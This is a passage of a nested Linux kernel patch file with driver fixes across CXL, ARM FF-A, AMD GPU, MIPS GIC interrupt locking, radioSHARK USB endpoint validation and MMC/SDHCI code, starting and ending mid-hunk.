++		return -EINVAL;
+ 
++	/* Check MEM ACTIVE bit, up to 60s timeout by default */
++	for (i = media_ready_timeout; i; i--) {
+ 		rc = pci_read_config_dword(
+-			pdev, d + CXL_DVSEC_RANGE_SIZE_LOW(0), &temp);
++			pdev, d + CXL_DVSEC_RANGE_SIZE_LOW(id), &temp);
+ 		if (rc)
+ 			return rc;
+ 
+@@ -136,6 +170,39 @@ int cxl_await_media_ready(struct cxl_dev_state *cxlds)
+ 		return -ETIMEDOUT;
+ 	}
+ 
++	return 0;
++}
++
++/*
++ * Wait up to @media_ready_timeout for the device to report memory
++ * active.
++ */
++int cxl_await_media_ready(struct cxl_dev_state *cxlds)
++{
++	struct pci_dev *pdev = to_pci_dev(cxlds->dev);
++	int d = cxlds->cxl_dvsec;
++	int rc, i, hdm_count;
++	u64 md_status;
++	u16 cap;
++
++	rc = pci_read_config_word(pdev,
++				  d + CXL_DVSEC_CAP_OFFSET, &cap);
++	if (rc)
++		return rc;
++
++	hdm_count = FIELD_GET(CXL_DVSEC_HDM_COUNT_MASK, cap);
++	for (i = 0; i < hdm_count; i++) {
++		rc = cxl_dvsec_mem_range_valid(cxlds, i);
++		if (rc)
++			return rc;
++	}
++
++	for (i = 0; i < hdm_count; i++) {
++		rc = cxl_dvsec_mem_range_active(cxlds, i);
++		if (rc)
++			return rc;
++	}
++
+ 	md_status = readq(cxlds->regs.memdev + CXLMDEV_STATUS_OFFSET);
+ 	if (!CXLMDEV_READY(md_status))
+ 		return -EIO;
+diff --git a/drivers/cxl/cxlpci.h b/drivers/cxl/cxlpci.h
+index 79e5603dfc82d..d6fafa1f92a47 100644
+--- a/drivers/cxl/cxlpci.h
++++ b/drivers/cxl/cxlpci.h
+@@ -31,6 +31,8 @@
+ #define   CXL_DVSEC_RANGE_BASE_LOW(i)	(0x24 + (i * 0x10))
+ #define     CXL_DVSEC_MEM_BASE_LOW_MASK	GENMASK(31, 28)
+ 
++#define CXL_DVSEC_RANGE_MAX		2
++
+ /* CXL 2.0 8.1.4: Non-CXL Function Map DVSEC */
+ #define CXL_DVSEC_FUNCTION_MAP					2
+ 
+diff --git a/drivers/firmware/arm_ffa/bus.c b/drivers/firmware/arm_ffa/bus.c
+index 99d4394806126..b9ce784f087df 100644
+--- a/drivers/firmware/arm_ffa/bus.c
++++ b/drivers/firmware/arm_ffa/bus.c
+@@ -15,6 +15,8 @@
+ 
+ #include "common.h"
+ 
++static DEFINE_IDA(ffa_bus_id);
++
+ static int ffa_device_match(struct device *dev, struct device_driver *drv)
+ {
+ 	const struct ffa_device_id *id_table;
+@@ -53,7 +55,8 @@ static void ffa_device_remove(struct device *dev)
+ {
+ 	struct ffa_driver *ffa_drv = to_ffa_driver(dev->driver);
+ 
+-	ffa_drv->remove(to_ffa_dev(dev));
++	if (ffa_drv->remove)
++		ffa_drv->remove(to_ffa_dev(dev));
+ }
+ 
+ static int ffa_device_uevent(struct device *dev, struct kobj_uevent_env *env)
+@@ -130,6 +133,7 @@ static void ffa_release_device(struct device *dev)
+ {
+ 	struct ffa_device *ffa_dev = to_ffa_dev(dev);
+ 
++	ida_free(&ffa_bus_id, ffa_dev->id);
+ 	kfree(ffa_dev);
+ }
+ 
+@@ -170,18 +174,24 @@ bool ffa_device_is_valid(struct ffa_device *ffa_dev)
+ struct ffa_device *ffa_device_register(const uuid_t *uuid, int vm_id,
+ 				       const struct ffa_ops *ops)
+ {
+-	int ret;
++	int id, ret;
+ 	struct device *dev;
+ 	struct ffa_device *ffa_dev;
+ 
++	id = ida_alloc_min(&ffa_bus_id, 1, GFP_KERNEL);
++	if (id < 0)
++		return NULL;
++
+ 	ffa_dev = kzalloc(sizeof(*ffa_dev), GFP_KERNEL);
+-	if (!ffa_dev)
++	if (!ffa_dev) {
++		ida_free(&ffa_bus_id, id);
+ 		return NULL;
++	}
+ 
+ 	dev = &ffa_dev->dev;
+ 	dev->bus = &ffa_bus_type;
+ 	dev->release = ffa_release_device;
+-	dev_set_name(&ffa_dev->dev, "arm-ffa-%04x", vm_id);
++	dev_set_name(&ffa_dev->dev, "arm-ffa-%d", id);
+ 
+ 	ffa_dev->vm_id = vm_id;
+ 	ffa_dev->ops = ops;
+@@ -217,4 +227,5 @@ void arm_ffa_bus_exit(void)
+ {
+ 	ffa_devices_unregister();
+ 	bus_unregister(&ffa_bus_type);
++	ida_destroy(&ffa_bus_id);
+ }
+diff --git a/drivers/firmware/arm_ffa/driver.c b/drivers/firmware/arm_ffa/driver.c
+index d5e86ef40b896..737f36e7a9035 100644
+--- a/drivers/firmware/arm_ffa/driver.c
++++ b/drivers/firmware/arm_ffa/driver.c
+@@ -501,12 +501,17 @@ ffa_setup_and_transmit(u32 func_id, void *buffer, u32 max_fragsize,
+ 		ep_mem_access->receiver = args->attrs[idx].receiver;
+ 		ep_mem_access->attrs = args->attrs[idx].attrs;
+ 		ep_mem_access->composite_off = COMPOSITE_OFFSET(args->nattrs);
++		ep_mem_access->flag = 0;
++		ep_mem_access->reserved = 0;
+ 	}
++	mem_region->reserved_0 = 0;
++	mem_region->reserved_1 = 0;
+ 	mem_region->ep_count = args->nattrs;
+ 
+ 	composite = buffer + COMPOSITE_OFFSET(args->nattrs);
+ 	composite->total_pg_cnt = ffa_get_num_pages_sg(args->sg);
+ 	composite->addr_range_cnt = num_entries;
++	composite->reserved = 0;
+ 
+ 	length = COMPOSITE_CONSTITUENTS_OFFSET(args->nattrs, num_entries);
+ 	frag_len = COMPOSITE_CONSTITUENTS_OFFSET(args->nattrs, 0);
+@@ -541,6 +546,7 @@ ffa_setup_and_transmit(u32 func_id, void *buffer, u32 max_fragsize,
+ 
+ 		constituents->address = sg_phys(args->sg);
+ 		constituents->pg_cnt = args->sg->length / FFA_PAGE_SIZE;
++		constituents->reserved = 0;
+ 		constituents++;
+ 		frag_len += sizeof(struct ffa_mem_region_addr_range);
+ 	} while ((args->sg = sg_next(args->sg)));
+diff --git a/drivers/gpio/gpio-mockup.c b/drivers/gpio/gpio-mockup.c
+index 523dfd17dd922..72a369cf82075 100644
+--- a/drivers/gpio/gpio-mockup.c
++++ b/drivers/gpio/gpio-mockup.c
+@@ -368,7 +368,7 @@ static void gpio_mockup_debugfs_setup(struct device *dev,
+ 		priv->offset = i;
+ 		priv->desc = gpiochip_get_desc(gc, i);
+ 
+-		debugfs_create_file(name, 0200, chip->dbg_dir, priv,
++		debugfs_create_file(name, 0600, chip->dbg_dir, priv,
+ 				    &gpio_mockup_debugfs_ops);
+ 	}
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
+index 7e8b7171068dc..bebd136ed5444 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
+@@ -1328,12 +1328,9 @@ int amdgpu_mes_self_test(struct amdgpu_device *adev)
+ 	struct amdgpu_mes_ctx_data ctx_data = {0};
+ 	struct amdgpu_ring *added_rings[AMDGPU_MES_CTX_MAX_RINGS] = { NULL };
+ 	int gang_ids[3] = {0};
+-	int queue_types[][2] = { { AMDGPU_RING_TYPE_GFX,
+-				   AMDGPU_MES_CTX_MAX_GFX_RINGS},
+-				 { AMDGPU_RING_TYPE_COMPUTE,
+-				   AMDGPU_MES_CTX_MAX_COMPUTE_RINGS},
+-				 { AMDGPU_RING_TYPE_SDMA,
+-				   AMDGPU_MES_CTX_MAX_SDMA_RINGS } };
++	int queue_types[][2] = { { AMDGPU_RING_TYPE_GFX, 1 },
++				 { AMDGPU_RING_TYPE_COMPUTE, 1 },
++				 { AMDGPU_RING_TYPE_SDMA, 1} };
+ 	int i, r, pasid, k = 0;
+ 
+ 	pasid = amdgpu_pasid_alloc(16);
+diff --git a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+index 08766b6784361..321a5ffebe88b 100644
+--- a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+@@ -390,6 +390,7 @@ static int mes_v11_0_set_hw_resources(struct amdgpu_mes *mes)
+ 	mes_set_hw_res_pkt.disable_reset = 1;
+ 	mes_set_hw_res_pkt.disable_mes_log = 1;
+ 	mes_set_hw_res_pkt.use_different_vmid_compute = 1;
++	mes_set_hw_res_pkt.enable_reg_active_poll = 1;
+ 	mes_set_hw_res_pkt.oversubscription_timer = 50;
+ 
+ 	return mes_v11_0_submit_pkt_and_poll_completion(mes,
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_link.c b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+index 6299130663a3d..5d53e54ebe90b 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_link.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+@@ -1634,14 +1634,18 @@ static bool dc_link_construct_legacy(struct dc_link *link,
+ 				link->irq_source_hpd = DC_IRQ_SOURCE_INVALID;
+ 
+ 			switch (link->dc->config.allow_edp_hotplug_detection) {
+-			case 1: // only the 1st eDP handles hotplug
++			case HPD_EN_FOR_ALL_EDP:
++				link->irq_source_hpd_rx =
++						dal_irq_get_rx_source(link->hpd_gpio);
++				break;
++			case HPD_EN_FOR_PRIMARY_EDP_ONLY:
+ 				if (link->link_index == 0)
+ 					link->irq_source_hpd_rx =
+ 						dal_irq_get_rx_source(link->hpd_gpio);
+ 				else
+ 					link->irq_source_hpd = DC_IRQ_SOURCE_INVALID;
+ 				break;
+-			case 2: // only the 2nd eDP handles hotplug
++			case HPD_EN_FOR_SECONDARY_EDP_ONLY:
+ 				if (link->link_index == 1)
+ 					link->irq_source_hpd_rx =
+ 						dal_irq_get_rx_source(link->hpd_gpio);
+@@ -1649,6 +1653,7 @@ static bool dc_link_construct_legacy(struct dc_link *link,
+ 					link->irq_source_hpd = DC_IRQ_SOURCE_INVALID;
+ 				break;
+ 			default:
++				link->irq_source_hpd = DC_IRQ_SOURCE_INVALID;
+ 				break;
+ 			}
+ 		}
+diff --git a/drivers/gpu/drm/amd/display/dc/dc_types.h b/drivers/gpu/drm/amd/display/dc/dc_types.h
+index ad9041472ccae..6050a3469a57c 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc_types.h
++++ b/drivers/gpu/drm/amd/display/dc/dc_types.h
+@@ -993,4 +993,10 @@ struct display_endpoint_id {
+ 	enum display_endpoint_type ep_type;
+ };
+ 
++enum dc_hpd_enable_select {
++	HPD_EN_FOR_ALL_EDP = 0,
++	HPD_EN_FOR_PRIMARY_EDP_ONLY,
++	HPD_EN_FOR_SECONDARY_EDP_ONLY,
++};
++
+ #endif /* DC_TYPES_H_ */
+diff --git a/drivers/gpu/drm/amd/include/mes_v11_api_def.h b/drivers/gpu/drm/amd/include/mes_v11_api_def.h
+index 7e85cdc5bd34e..dc694cb246d9f 100644
+--- a/drivers/gpu/drm/amd/include/mes_v11_api_def.h
++++ b/drivers/gpu/drm/amd/include/mes_v11_api_def.h
+@@ -222,7 +222,11 @@ union MESAPI_SET_HW_RESOURCES {
+ 				uint32_t apply_grbm_remote_register_dummy_read_wa : 1;
+ 				uint32_t second_gfx_pipe_enabled : 1;
+ 				uint32_t enable_level_process_quantum_check : 1;
+-				uint32_t reserved	: 25;
++				uint32_t legacy_sch_mode : 1;
++				uint32_t disable_add_queue_wptr_mc_addr : 1;
++				uint32_t enable_mes_event_int_logging : 1;
++				uint32_t enable_reg_active_poll : 1;
++				uint32_t reserved	: 21;
+ 			};
+ 			uint32_t	uint32_t_all;
+ 		};
+diff --git a/drivers/gpu/drm/amd/pm/amdgpu_pm.c b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+index 2f3e239e623dc..7d613118cb713 100644
+--- a/drivers/gpu/drm/amd/pm/amdgpu_pm.c
++++ b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+@@ -869,13 +869,11 @@ static ssize_t amdgpu_get_pp_od_clk_voltage(struct device *dev,
+ 	}
+ 	if (ret == -ENOENT) {
+ 		size = amdgpu_dpm_print_clock_levels(adev, OD_SCLK, buf);
+-		if (size > 0) {
+-			size += amdgpu_dpm_print_clock_levels(adev, OD_MCLK, buf + size);
+-			size += amdgpu_dpm_print_clock_levels(adev, OD_VDDC_CURVE, buf + size);
+-			size += amdgpu_dpm_print_clock_levels(adev, OD_VDDGFX_OFFSET, buf + size);
+-			size += amdgpu_dpm_print_clock_levels(adev, OD_RANGE, buf + size);
+-			size += amdgpu_dpm_print_clock_levels(adev, OD_CCLK, buf + size);
+-		}
++		size += amdgpu_dpm_print_clock_levels(adev, OD_MCLK, buf + size);
++		size += amdgpu_dpm_print_clock_levels(adev, OD_VDDC_CURVE, buf + size);
++		size += amdgpu_dpm_print_clock_levels(adev, OD_VDDGFX_OFFSET, buf + size);
++		size += amdgpu_dpm_print_clock_levels(adev, OD_RANGE, buf + size);
++		size += amdgpu_dpm_print_clock_levels(adev, OD_CCLK, buf + size);
+ 	}
+ 
+ 	if (size == 0)
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+index 9dd92bbdcefdc..bd61518bb7b12 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+@@ -125,6 +125,7 @@ static struct cmn2asic_msg_mapping smu_v13_0_7_message_map[SMU_MSG_MAX_COUNT] =
+ 	MSG_MAP(ArmD3,				PPSMC_MSG_ArmD3,                       0),
+ 	MSG_MAP(AllowGpo,			PPSMC_MSG_SetGpoAllow,           0),
+ 	MSG_MAP(GetPptLimit,			PPSMC_MSG_GetPptLimit,                 0),
++	MSG_MAP(NotifyPowerSource,		PPSMC_MSG_NotifyPowerSource,           0),
+ };
+ 
+ static struct cmn2asic_mapping smu_v13_0_7_clk_map[SMU_CLK_COUNT] = {
+diff --git a/drivers/gpu/drm/drm_managed.c b/drivers/gpu/drm/drm_managed.c
+index 4cf214de50c40..c21c3f6230335 100644
+--- a/drivers/gpu/drm/drm_managed.c
++++ b/drivers/gpu/drm/drm_managed.c
+@@ -264,28 +264,10 @@ void drmm_kfree(struct drm_device *dev, void *data)
+ }
+ EXPORT_SYMBOL(drmm_kfree);
+ 
+-static void drmm_mutex_release(struct drm_device *dev, void *res)
++void __drmm_mutex_release(struct drm_device *dev, void *res)
+ {
+ 	struct mutex *lock = res;
+ 
+ 	mutex_destroy(lock);
+ }
+-
+-/**
+- * drmm_mutex_init - &drm_device-managed mutex_init()
+- * @dev: DRM device
+- * @lock: lock to be initialized
+- *
+- * Returns:
+- * 0 on success, or a negative errno code otherwise.
+- *
+- * This is a &drm_device-managed version of mutex_init(). The initialized
+- * lock is automatically destroyed on the final drm_dev_put().
+- */
+-int drmm_mutex_init(struct drm_device *dev, struct mutex *lock)
+-{
+-	mutex_init(lock);
+-
+-	return drmm_add_action_or_reset(dev, drmm_mutex_release, lock);
+-}
+-EXPORT_SYMBOL(drmm_mutex_init);
++EXPORT_SYMBOL(__drmm_mutex_release);
+diff --git a/drivers/gpu/drm/mgag200/mgag200_mode.c b/drivers/gpu/drm/mgag200/mgag200_mode.c
+index bbab2549243ab..ae90b260312a5 100644
+--- a/drivers/gpu/drm/mgag200/mgag200_mode.c
++++ b/drivers/gpu/drm/mgag200/mgag200_mode.c
+@@ -640,6 +640,11 @@ void mgag200_crtc_helper_atomic_enable(struct drm_crtc *crtc, struct drm_atomic_
+ 	if (funcs->pixpllc_atomic_update)
+ 		funcs->pixpllc_atomic_update(crtc, old_state);
+ 
++	if (crtc_state->gamma_lut)
++		mgag200_crtc_set_gamma(mdev, format, crtc_state->gamma_lut->data);
++	else
++		mgag200_crtc_set_gamma_linear(mdev, format);
++
+ 	mgag200_enable_display(mdev);
+ 
+ 	if (funcs->enable_vidrst)
+diff --git a/drivers/gpu/drm/radeon/radeon_irq_kms.c b/drivers/gpu/drm/radeon/radeon_irq_kms.c
+index da2173435eddb..6541c1f6fca61 100644
+--- a/drivers/gpu/drm/radeon/radeon_irq_kms.c
++++ b/drivers/gpu/drm/radeon/radeon_irq_kms.c
+@@ -100,6 +100,16 @@ static void radeon_hotplug_work_func(struct work_struct *work)
+ 
+ static void radeon_dp_work_func(struct work_struct *work)
+ {
++	struct radeon_device *rdev = container_of(work, struct radeon_device,
++						  dp_work);
++	struct drm_device *dev = rdev->ddev;
++	struct drm_mode_config *mode_config = &dev->mode_config;
++	struct drm_connector *connector;
++
++	mutex_lock(&mode_config->mutex);
++	list_for_each_entry(connector, &mode_config->connector_list, head)
++		radeon_connector_hotplug(connector);
++	mutex_unlock(&mode_config->mutex);
+ }
+ 
+ /**
+diff --git a/drivers/hwtracing/coresight/coresight-tmc-etr.c b/drivers/hwtracing/coresight/coresight-tmc-etr.c
+index 867ad8bb9b0c3..368f2e5a86278 100644
+--- a/drivers/hwtracing/coresight/coresight-tmc-etr.c
++++ b/drivers/hwtracing/coresight/coresight-tmc-etr.c
+@@ -942,7 +942,7 @@ tmc_etr_buf_insert_barrier_packet(struct etr_buf *etr_buf, u64 offset)
+ 
+ 	len = tmc_etr_buf_get_data(etr_buf, offset,
+ 				   CORESIGHT_BARRIER_PKT_SIZE, &bufp);
+-	if (WARN_ON(len < CORESIGHT_BARRIER_PKT_SIZE))
++	if (WARN_ON(len < 0 || len < CORESIGHT_BARRIER_PKT_SIZE))
+ 		return -EINVAL;
+ 	coresight_insert_barrier_packet(bufp);
+ 	return offset + CORESIGHT_BARRIER_PKT_SIZE;
+diff --git a/drivers/irqchip/irq-mips-gic.c b/drivers/irqchip/irq-mips-gic.c
+index 1ba0f1555c805..3a33aefec8a48 100644
+--- a/drivers/irqchip/irq-mips-gic.c
++++ b/drivers/irqchip/irq-mips-gic.c
+@@ -50,7 +50,7 @@ void __iomem *mips_gic_base;
+ 
+ static DEFINE_PER_CPU_READ_MOSTLY(unsigned long[GIC_MAX_LONGS], pcpu_masks);
+ 
+-static DEFINE_SPINLOCK(gic_lock);
++static DEFINE_RAW_SPINLOCK(gic_lock);
+ static struct irq_domain *gic_irq_domain;
+ static int gic_shared_intrs;
+ static unsigned int gic_cpu_pin;
+@@ -211,7 +211,7 @@ static int gic_set_type(struct irq_data *d, unsigned int type)
+ 
+ 	irq = GIC_HWIRQ_TO_SHARED(d->hwirq);
+ 
+-	spin_lock_irqsave(&gic_lock, flags);
++	raw_spin_lock_irqsave(&gic_lock, flags);
+ 	switch (type & IRQ_TYPE_SENSE_MASK) {
+ 	case IRQ_TYPE_EDGE_FALLING:
+ 		pol = GIC_POL_FALLING_EDGE;
+@@ -251,7 +251,7 @@ static int gic_set_type(struct irq_data *d, unsigned int type)
+ 	else
+ 		irq_set_chip_handler_name_locked(d, &gic_level_irq_controller,
+ 						 handle_level_irq, NULL);
+-	spin_unlock_irqrestore(&gic_lock, flags);
++	raw_spin_unlock_irqrestore(&gic_lock, flags);
+ 
+ 	return 0;
+ }
+@@ -269,7 +269,7 @@ static int gic_set_affinity(struct irq_data *d, const struct cpumask *cpumask,
+ 		return -EINVAL;
+ 
+ 	/* Assumption : cpumask refers to a single CPU */
+-	spin_lock_irqsave(&gic_lock, flags);
++	raw_spin_lock_irqsave(&gic_lock, flags);
+ 
+ 	/* Re-route this IRQ */
+ 	write_gic_map_vp(irq, BIT(mips_cm_vp_id(cpu)));
+@@ -280,7 +280,7 @@ static int gic_set_affinity(struct irq_data *d, const struct cpumask *cpumask,
+ 		set_bit(irq, per_cpu_ptr(pcpu_masks, cpu));
+ 
+ 	irq_data_update_effective_affinity(d, cpumask_of(cpu));
+-	spin_unlock_irqrestore(&gic_lock, flags);
++	raw_spin_unlock_irqrestore(&gic_lock, flags);
+ 
+ 	return IRQ_SET_MASK_OK;
+ }
+@@ -358,12 +358,12 @@ static void gic_mask_local_irq_all_vpes(struct irq_data *d)
+ 	cd = irq_data_get_irq_chip_data(d);
+ 	cd->mask = false;
+ 
+-	spin_lock_irqsave(&gic_lock, flags);
++	raw_spin_lock_irqsave(&gic_lock, flags);
+ 	for_each_online_cpu(cpu) {
+ 		write_gic_vl_other(mips_cm_vp_id(cpu));
+ 		write_gic_vo_rmask(BIT(intr));
+ 	}
+-	spin_unlock_irqrestore(&gic_lock, flags);
++	raw_spin_unlock_irqrestore(&gic_lock, flags);
+ }
+ 
+ static void gic_unmask_local_irq_all_vpes(struct irq_data *d)
+@@ -376,12 +376,12 @@ static void gic_unmask_local_irq_all_vpes(struct irq_data *d)
+ 	cd = irq_data_get_irq_chip_data(d);
+ 	cd->mask = true;
+ 
+-	spin_lock_irqsave(&gic_lock, flags);
++	raw_spin_lock_irqsave(&gic_lock, flags);
+ 	for_each_online_cpu(cpu) {
+ 		write_gic_vl_other(mips_cm_vp_id(cpu));
+ 		write_gic_vo_smask(BIT(intr));
+ 	}
+-	spin_unlock_irqrestore(&gic_lock, flags);
++	raw_spin_unlock_irqrestore(&gic_lock, flags);
+ }
+ 
+ static void gic_all_vpes_irq_cpu_online(void)
+@@ -394,19 +394,21 @@ static void gic_all_vpes_irq_cpu_online(void)
+ 	unsigned long flags;
+ 	int i;
+ 
+-	spin_lock_irqsave(&gic_lock, flags);
++	raw_spin_lock_irqsave(&gic_lock, flags);
+ 
+ 	for (i = 0; i < ARRAY_SIZE(local_intrs); i++) {
+ 		unsigned int intr = local_intrs[i];
+ 		struct gic_all_vpes_chip_data *cd;
+ 
++		if (!gic_local_irq_is_routable(intr))
++			continue;
+ 		cd = &gic_all_vpes_chip_data[intr];
+ 		write_gic_vl_map(mips_gic_vx_map_reg(intr), cd->map);
+ 		if (cd->mask)
+ 			write_gic_vl_smask(BIT(intr));
+ 	}
+ 
+-	spin_unlock_irqrestore(&gic_lock, flags);
++	raw_spin_unlock_irqrestore(&gic_lock, flags);
+ }
+ 
+ static struct irq_chip gic_all_vpes_local_irq_controller = {
+@@ -436,11 +438,11 @@ static int gic_shared_irq_domain_map(struct irq_domain *d, unsigned int virq,
+ 
+ 	data = irq_get_irq_data(virq);
+ 
+-	spin_lock_irqsave(&gic_lock, flags);
++	raw_spin_lock_irqsave(&gic_lock, flags);
+ 	write_gic_map_pin(intr, GIC_MAP_PIN_MAP_TO_PIN | gic_cpu_pin);
+ 	write_gic_map_vp(intr, BIT(mips_cm_vp_id(cpu)));
+ 	irq_data_update_effective_affinity(data, cpumask_of(cpu));
+-	spin_unlock_irqrestore(&gic_lock, flags);
++	raw_spin_unlock_irqrestore(&gic_lock, flags);
+ 
+ 	return 0;
+ }
+@@ -535,12 +537,12 @@ static int gic_irq_domain_map(struct irq_domain *d, unsigned int virq,
+ 	if (!gic_local_irq_is_routable(intr))
+ 		return -EPERM;
+ 
+-	spin_lock_irqsave(&gic_lock, flags);
++	raw_spin_lock_irqsave(&gic_lock, flags);
+ 	for_each_online_cpu(cpu) {
+ 		write_gic_vl_other(mips_cm_vp_id(cpu));
+ 		write_gic_vo_map(mips_gic_vx_map_reg(intr), map);
+ 	}
+-	spin_unlock_irqrestore(&gic_lock, flags);
++	raw_spin_unlock_irqrestore(&gic_lock, flags);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/media/radio/radio-shark.c b/drivers/media/radio/radio-shark.c
+index 8230da828d0ee..127a3be0e0f07 100644
+--- a/drivers/media/radio/radio-shark.c
++++ b/drivers/media/radio/radio-shark.c
+@@ -316,6 +316,16 @@ static int usb_shark_probe(struct usb_interface *intf,
+ {
+ 	struct shark_device *shark;
+ 	int retval = -ENOMEM;
++	static const u8 ep_addresses[] = {
++		SHARK_IN_EP | USB_DIR_IN,
++		SHARK_OUT_EP | USB_DIR_OUT,
++		0};
++
++	/* Are the expected endpoints present? */
++	if (!usb_check_int_endpoints(intf, ep_addresses)) {
++		dev_err(&intf->dev, "Invalid radioSHARK device\n");
++		return -EINVAL;
++	}
+ 
+ 	shark = kzalloc(sizeof(struct shark_device), GFP_KERNEL);
+ 	if (!shark)
+diff --git a/drivers/media/radio/radio-shark2.c b/drivers/media/radio/radio-shark2.c
+index d150f12382c60..f1c5c0a6a335c 100644
+--- a/drivers/media/radio/radio-shark2.c
++++ b/drivers/media/radio/radio-shark2.c
+@@ -282,6 +282,16 @@ static int usb_shark_probe(struct usb_interface *intf,
+ {
+ 	struct shark_device *shark;
+ 	int retval = -ENOMEM;
++	static const u8 ep_addresses[] = {
++		SHARK_IN_EP | USB_DIR_IN,
++		SHARK_OUT_EP | USB_DIR_OUT,
++		0};
++
++	/* Are the expected endpoints present? */
++	if (!usb_check_int_endpoints(intf, ep_addresses)) {
++		dev_err(&intf->dev, "Invalid radioSHARK2 device\n");
++		return -EINVAL;
++	}
+ 
+ 	shark = kzalloc(sizeof(struct shark_device), GFP_KERNEL);
+ 	if (!shark)
+diff --git a/drivers/mmc/core/block.c b/drivers/mmc/core/block.c
+index db6d8a0999100..498333b769fdb 100644
+--- a/drivers/mmc/core/block.c
++++ b/drivers/mmc/core/block.c
+@@ -266,6 +266,7 @@ static ssize_t power_ro_lock_store(struct device *dev,
+ 		goto out_put;
+ 	}
+ 	req_to_mmc_queue_req(req)->drv_op = MMC_DRV_OP_BOOT_WP;
++	req_to_mmc_queue_req(req)->drv_op_result = -EIO;
+ 	blk_execute_rq(req, false);
+ 	ret = req_to_mmc_queue_req(req)->drv_op_result;
+ 	blk_mq_free_request(req);
+@@ -657,6 +658,7 @@ static int mmc_blk_ioctl_cmd(struct mmc_blk_data *md,
+ 	idatas[0] = idata;
+ 	req_to_mmc_queue_req(req)->drv_op =
+ 		rpmb ? MMC_DRV_OP_IOCTL_RPMB : MMC_DRV_OP_IOCTL;
++	req_to_mmc_queue_req(req)->drv_op_result = -EIO;
+ 	req_to_mmc_queue_req(req)->drv_op_data = idatas;
+ 	req_to_mmc_queue_req(req)->ioc_count = 1;
+ 	blk_execute_rq(req, false);
+@@ -728,6 +730,7 @@ static int mmc_blk_ioctl_multi_cmd(struct mmc_blk_data *md,
+ 	}
+ 	req_to_mmc_queue_req(req)->drv_op =
+ 		rpmb ? MMC_DRV_OP_IOCTL_RPMB : MMC_DRV_OP_IOCTL;
++	req_to_mmc_queue_req(req)->drv_op_result = -EIO;
+ 	req_to_mmc_queue_req(req)->drv_op_data = idata;
+ 	req_to_mmc_queue_req(req)->ioc_count = n;
+ 	blk_execute_rq(req, false);
+@@ -2812,6 +2815,7 @@ static int mmc_dbg_card_status_get(void *data, u64 *val)
+ 	if (IS_ERR(req))
+ 		return PTR_ERR(req);
+ 	req_to_mmc_queue_req(req)->drv_op = MMC_DRV_OP_GET_CARD_STATUS;
++	req_to_mmc_queue_req(req)->drv_op_result = -EIO;
+ 	blk_execute_rq(req, false);
+ 	ret = req_to_mmc_queue_req(req)->drv_op_result;
+ 	if (ret >= 0) {
+@@ -2850,6 +2854,7 @@ static int mmc_ext_csd_open(struct inode *inode, struct file *filp)
+ 		goto out_free;
+ 	}
+ 	req_to_mmc_queue_req(req)->drv_op = MMC_DRV_OP_GET_EXT_CSD;
++	req_to_mmc_queue_req(req)->drv_op_result = -EIO;
+ 	req_to_mmc_queue_req(req)->drv_op_data = &ext_csd;
+ 	blk_execute_rq(req, false);
+ 	err = req_to_mmc_queue_req(req)->drv_op_result;
+diff --git a/drivers/mmc/host/sdhci-esdhc-imx.c b/drivers/mmc/host/sdhci-esdhc-imx.c
+index 8c62c3fba75e8..b63cf1f9e8fb9 100644
+--- a/drivers/mmc/host/sdhci-esdhc-imx.c
++++ b/drivers/mmc/host/sdhci-esdhc-imx.c
+@@ -1585,6 +1585,10 @@ sdhci_esdhc_imx_probe_dt(struct platform_device *pdev,
+ 	if (ret)
+ 		return ret;
+ 
++	/* HS400/HS400ES require 8 bit bus */
++	if (!(host->mmc->caps & MMC_CAP_8_BIT_DATA))
++		host->mmc->caps2 &= ~(MMC_CAP2_HS400 | MMC_CAP2_HS400_ES);
++
+ 	if (mmc_gpio_get_cd(host->mmc) >= 0)
+ 		host->quirks &= ~SDHCI_QUIRK_BROKEN_CARD_DETECTION;
+ 
+@@ -1669,10 +1673,6 @@ static int sdhci_esdhc_imx_probe(struct platform_device *pdev)
+ 		host->mmc_host_ops.execute_tuning = usdhc_execute_tuning;
+ 	}
+ 
+-	err = sdhci_esdhc_imx_probe_dt(pdev, host, imx_data);
+-	if (err)
+-		goto disable_ahb_clk;
+-
+ 	if (imx_data->socdata->flags & ESDHC_FLAG_MAN_TUNING)
+ 		sdhci_esdhc_ops.platform_execute_tuning =
+ 					esdhc_executing_tuning;
+@@ -1680,15 +1680,13 @@ static int sdhci_esdhc_imx_probe(struct platform_device *pdev)
+ 	if (imx_data->socdata->flags & ESDHC_FLAG_ERR004536)
+ 		host->quirks |= SDHCI_QUIRK_BROKEN_ADMA;
+ 
+-	if (host->mmc->caps & MMC_CAP_8_BIT_DATA &&
+-	    imx_data->socdata->flags & ESDHC_FLAG_HS400)
++	if (imx_data->socdata->flags & ESDHC_FLAG_HS400)
+ 		host->mmc->caps2 |= MMC_CAP2_HS400;
+ 
+ 	if (imx_data->socdata->flags & ESDHC_FLAG_BROKEN_AUTO_CMD23)
+ 		host->quirks2 |= SDHCI_QUIRK2_ACMD23_BROKEN;
+ 
+-	if (host->mmc->caps & MMC_CAP_8_BIT_DATA &&
+-	    imx_data->socdata->flags & ESDHC_FLAG_HS400_ES) {
++	if (imx_data->socdata->flags & ESDHC_FLAG_HS400_ES) {
+ 		host->mmc->caps2 |= MMC_CAP2_HS400_ES;
+ 		host->mmc_host_ops.hs400_enhanced_strobe =
